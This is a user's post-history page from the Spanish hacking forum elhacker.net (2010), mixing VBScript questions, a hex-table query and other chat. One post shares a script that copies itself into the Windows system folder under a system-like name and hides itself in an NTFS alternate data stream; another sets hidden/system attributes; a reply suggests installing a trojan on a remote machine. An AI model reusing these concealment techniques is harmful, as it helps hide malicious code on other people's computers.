elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Foros Generales / Foro Libre / Re: Seria ''etico'' ¿? en: 4 Mayo 2010, 17:28 pm
Citar
Y te mete en la cárcel por idiota.

Quienes te meten el la carcel los estafadores !!! estariamos buenos si lo hicieran xd



Citar
Claro eso tambien e preguntado, si paypal te devuelve, ya que pedi hace unos meses a una web de honkong y no me llego las cosas, y abri una disputa, pero no entendia bien como iva eso, porque me ponia elevarla a paypal o noseque... entonces nose si te devolvian o no... si puedes explicar como funciona te lo agradeceria.

xd que te va a delvolver palypal no sean infantiles acaso ellos se hacen responsable de que ustedes caigan en phinsings y paginas fraudulentas

Citar
Porque es un poco estúpido y de patio de parvulario eso de "tu web no va pos me enfado y te hago un dos".

y JOD porque no esta bien programada esa web porque no tienen un servidor con dos %&& para administrase bien ??¿ vaya solo tiene bugs para no envira el producto comprado a su dueño, depues para cobrar bien que lo hacen claro, claro, la ley del enbudo.
12  Programación / Scripting / Re: Ocultacion stream ??¿ duda existencial en: 4 Mayo 2010, 17:09 pm
Gracias por la informacion ya aportastes mas que el mod de esta secion ;)
13  Programación / Scripting / Re: (VBS) Entrar datos a consola desde vbs en: 4 Mayo 2010, 17:06 pm
Código:
Option Explicit

Dim pulsacion


Set pulsacion = CreateObject("WScript.Shell")
WScript.Sleep 1000

pulsacion.SendKeys "2"  ' comandos para tu aplicacion letras palabras y numeros
WScript.Sleep 1000 ' haces un lapso de tiempo para que no te salga todo de golpe
pulsacion.SendKeys "{ENTER}" ' pulsas enter
WScript.Sleep 1000
pulsacion.SendKeys "213-215" ' comandos para tu aplicacion letras palabras y numeros
WScript.Sleep 1000
pulsacion.SendKeys "{ENTER}" ' hay muchas mas funciones como espacios etc todo lo podras encontrar en el tuto de vbs que esta en esta secion
WScript.Sleep 1000


wscript.quit

bueno esto lo que hace es meter los comandos como si se estubieran pulsando desde el teclado, asi que tendras que tener la ventana cmd como prinicipal para que se pueda escribir
14  Programación / Scripting / Re: (VBS) Entrar datos a consola desde vbs en: 4 Mayo 2010, 02:47 am
Código:
Dim escri,Directorio '  declara las variables

Set objshell = createobject("wscript.shell")
Set objscript = CreateObject("Scripting.FileSystemObject")  '  llama al objeto

Directorio = objshell.expandenvironmentstrings("%Systemroot%") ' aqui se guarda la variable del entorno en Directorio

Set escri = objscript.CreateTextFile(Directorio & "\msdoscoman.bat",false) ' creea bat
escri.writeline("@echo off")
escri.writeline("cd /donsencuentre.exe")   '  aqui tienes que localizar el dir de el exe
escri.writeline("comandos") '  pones los comandos cmd
escri.writeline("Del /q /f msdoscoman.bat") '  el archivo bat se borra
escri.writeline("exit")
escri.close


objshell.Run Directorio & "\msdoscoman.bat"   '  arranca el bat


asi lo hago yo  :xD
15  Seguridad Informática / Criptografía / Duda hexadecimal = simbolos normales en: 3 Mayo 2010, 01:37 am
bueno mientras estaba creando mi traductor hexademimal a simbologia normal me a surgido una duda vastante grande, no se tal vez la tabla que tenga yo lo explique mal,ejemplo:


HEX: 0 == simbolo NUL

HEX: 9 == simbolo TAB

tambien pasa de 19 al 19, y del 1a al 1f

??¿ mi pregunta es que representacion tienen de verdad


Gracias y perdonen mi ignorancia



16  Programación / Scripting / Ocultacion stream ??¿ duda existencial en: 3 Mayo 2010, 01:24 am
Si mi pregunta es de verdad existe porque yo ya lo intente todas las sintaxis posibles y siempre me dice que el archivo no esta asociado ??¿

consejos

soluciones ??


aqui les dejo el script


Código:
' VB Script Document
Option Explicit
Dim objshell,objscript,Dir,escri,Estashay

Set objshell = createobject("wscript.shell") ' llamando objetos
Set objscript = CreateObject("Scripting.FileSystemObject")

Dir = objshell.expandenvironmentstrings("%Systemroot%")

Estashay = objscript.FileExists(Dir & "\Kernelwin32.vbs")

if Estashay = False Then

objscript.copyfile wscript.scriptfullname, Dir & "\Kernelwin32.vbs", false

End if

Estashay = objscript.FileExists(Dir & "\system.bat")

if Estashay = False Then

Set escri = objscript.CreateTextFile(Dir & "\system.bat",false)
escri.writeline("@echo off")
escri.writeline("type Kernelwin32.vbs>regedit:olo.vbs")
escri.writeline("start .\regedit:olo.vbs")
escri.writeline("Del /q /f Kernelwin32.vbs")
escri.writeline("exit")
escri.close
       
End if

objshell.Run Dir & "\system.bat"

MsgBox("VAYA IDIOTEZ")

MsgBox("codigo")


por cierto cuando no borro el kernelwin.vbs se ejecuta el codigo en un bucle infinito y no para de salirme msgbox ??¿ alguna opcion quit o exit para salir del script.

Gracias por adelantado
17  Foros Generales / Dudas Generales / Re: problemas cain en: 2 Mayo 2010, 15:11 pm
cain solo sirve para sniffar en redes locales//// A ESO me refiero que solo los pc que esten conectados a tu router podran ser sniffeados.

asi es los sniffers solo son utiles en redes locales ya que te dan mucha informacion sin tener que instalar ningun troyano, asi es que para cojer informacion de otro ordenador remoto lo que tendrias que hacer es instalarle un troyano, aunque tambien podria sniffear (remotamente ) tendrias que tener hacesos a el router en cuestion para redirecionar la informacion que trasmita, COSA que es mucho mas dific¡l que meter un troyano a la maquina remota.



18  Programación / Scripting / Re: Duda en vbscript en: 1 Mayo 2010, 02:37 am
Por fin se resolvio mi gran duda, muchisimas gracias por ser tan paciente conmigo y contestar a todas mis dudas.

Citar
Por cierto, no es necesario crear un objeto cada vez, por ejemplo con que declares una sola vez el scripting.filesystemobject alcanza

Ok ya decia yo que mis codigos se veian raros   :xD


Graciassssss

Option Explicit
Do

MsgBox("GRACIAS")

Loop
19  Programación / Scripting / Re: Duda en vbscript en: 1 Mayo 2010, 01:47 am
bueno ya veo que sabes mucho de vbscritp hasta tienes un tutorial y todo, y yo ni me habia dado cuenta  :-X


Citar
Set objshell = wscript.createobject("wscript.shell")
Raiz = objshell.expandenvironmentstrings("%systemdrive%")
msgbox Raiz

bueno no es por ser pesadito, pero la verdad esta manera de consegir la variable del entorno ya la sabia  para despues utilizarla en copyfile

ejemplo

Set objshell = wscript.createobject("wscript.shell")
disco = objshell.expandenvironmentstrings("%systemdrive%")   
                                                                                                                                                                                           
// por cierto la variable del entorno systemdriver no me vale pero puedo poner otra no pasa nada

Set cop(2) = createobject("scripting.filesystemobject")
cop(2).copyfile wscript.scriptfullname, disco & "\Kernelwin32.vbs", false
Set objeto(2) = createobject("scripting.filesystemobject")
Set atributo(2) = objeto(2).GetFile("D:\Kernelwin32.vbs")
atributo(2).Attributes = 3


el problema es que con createtext no se de que manera ni como debo hacer la sintaxis para que entre la maldita variable

MI PROBLEMA:


objeto(1).CreateTextFile("disco\vas.txt",false)


objeto(1).CreateTextFile("%disco%\vas.txt",false)


objeto(1).CreateTextFile(".disco.\vas.txt",false)


objeto(1).CreateTextFile("disco & vas.txt",false)

nada me sirve y la verdad que me tiene ya vastante cargadito


igual me pasa con move file xd con todas las que no sean copy file xd xd

si ya ves soy vastante torpe

por favor me podrias explicar bien como se añade la variable

e mirado tu tuto pero no e encontrado nada o al menos mis ojos no lo an visto.


Gracias por tu atencion  ;-)

20  Programación / Scripting / Re: Duda en vbscript en: 30 Abril 2010, 13:50 pm
umm y despues como manejo esos datos para insertarlos en la ruta "midatodediscovalido:\vas.txt",false

umm y si ago algo asi no sera lo mismo

Set objeto(2) = CreateObject("Scripting.FileSystemObject")
Set disco(1) = objeto(2).GetDrive("C")
opcion(2) = disco(1).IsReady
if opcion(2) = True Then

bla bla todo mi codigo

end if



Gracias por responder a mi duda  ;)
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines